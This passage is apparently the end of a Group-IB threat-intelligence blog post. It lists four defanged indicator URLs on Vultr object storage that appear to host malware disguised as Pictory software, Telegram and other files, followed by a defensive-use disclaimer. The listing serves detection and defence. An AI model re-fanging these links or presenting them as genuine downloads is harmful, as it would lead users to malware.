hxxps://sgp1[.]vultrobjects[.]com/downloads/pictory/Pictory_premium_ver9.0.4.exe
hxxps://ppt1[.]sgp1[.]vultrobjects[.]com/RuntimeSSH_17[.]zip
hxxps://ams1[.]vultrobjects[.]com/micbucket/Temp/0412.mp4
hxxps://micbucket[.]ams1[.]vultrobjects[.]com/Exclude/Telegram.exe

DISCLAIMER: All technical information, including malware analysis, indicators of compromise and infrastructure details provided in this publication, is shared solely for defensive cybersecurity and research purposes. Group-IB does not endorse or permit any unauthorized or offensive use of the information contained herein. The data and conclusions represent Group-IB’s analytical assessment based on available evidence and are intended to help organizations detect, prevent, and respond to cyber threats.

Group-IB expressly disclaims liability for any misuse of the information provided. Organizations and readers are encouraged to apply this intelligence responsibly and in compliance with all applicable laws and regulations.

This blog may reference legitimate third-party services such as Telegram and others, solely to illustrate cases where threat actors have abused or misused these platforms.

This material is provided for informational purposes, prepared by Group-IB as part of its own analytical investigation, and reflects recently identified threat activity.

All trademarks referenced herein are the property of their respective owners and are used solely for informational purposes, without any implication of affiliation or sponsorship.